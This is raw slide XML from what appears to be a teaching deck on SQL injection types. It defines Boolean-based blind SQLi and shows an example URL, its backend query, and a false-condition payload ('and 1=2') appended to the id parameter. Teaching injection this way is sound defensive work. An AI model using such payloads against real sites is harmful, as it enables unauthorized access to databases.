                  <a:lnTo>
                    <a:pt x="158078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499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641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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574959" y="6984237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59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434928" y="701488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59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32349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2954811" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158077" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811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32349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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or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96577" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="4096577" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4128010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2954810" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810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28010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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="44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993871" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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595896" y="9049222"/>
            <a:ext cx="190944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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean</a:t>
            </a:r>
            <a:endParaRPr sz="44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651163" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113405" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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2625554" y="9049222"/>
            <a:ext cx="116459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60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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675006" y="7978793"/>
            <a:ext cx="11245850" cy="981075"/>
            <a:chOff x="1675006" y="7978793"/>
            <a:chExt cx="11245850" cy="981075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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06419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011201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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="8025964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90" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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434928" y="8025964"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266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951500"/>
            <a:ext cx="9455150" cy="11099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100" spc="-215"/>
              <a:t>Boolean-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-275"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-790"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-270"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="71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44752" y="2931714"/>
            <a:ext cx="15727680" cy="199580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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="650"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>blind </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>technique </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>conditions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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>return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350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>different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-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>result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-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>depending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-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on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75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>whether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-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-645">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-750">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FALSE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-795">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>result.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951500"/>
            <a:ext cx="9455150" cy="11099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100" spc="-215"/>
              <a:t>Boolean-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-275"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-790"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-270"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="71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35199" y="3005615"/>
            <a:ext cx="16341090" cy="39370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8575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com/app.php?id=1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7889" y="2367542"/>
            <a:ext cx="2052955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50" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>URL: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7889" y="3578814"/>
            <a:ext cx="2372360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50" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr sz="2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5199" y="4181338"/>
            <a:ext cx="16341090" cy="39370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8575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1459865" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="3044190" algn="l"/>
                <a:tab pos="4196715" algn="l"/>
                <a:tab pos="5060315" algn="l"/>
                <a:tab pos="5492750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1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7889" y="4752391"/>
            <a:ext cx="2785110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50" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(False):</a:t>
            </a:r>
            <a:endParaRPr sz="2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5199" y="5400191"/>
            <a:ext cx="16341090" cy="39370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8575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4483100" algn="l"/>
                <a:tab pos="5059680" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com/app.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1=2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7889" y="6056644"/>
            <a:ext cx="2372360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50" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
